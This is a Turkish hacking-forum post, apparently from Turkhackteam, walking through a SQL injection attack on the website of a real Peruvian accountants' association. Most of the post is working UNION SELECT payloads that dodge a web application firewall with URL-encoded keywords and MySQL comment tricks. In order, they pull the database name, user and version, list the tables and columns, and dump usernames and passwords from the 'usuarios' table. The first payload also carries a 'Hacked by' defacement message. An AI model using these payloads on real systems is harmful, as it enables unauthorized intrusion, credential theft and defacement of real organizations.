Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-



unknown.png

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-



unknown.png






burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-



unknown.png



KhJDZS.gif


Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.
M5MAyv.gif
Elinize sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.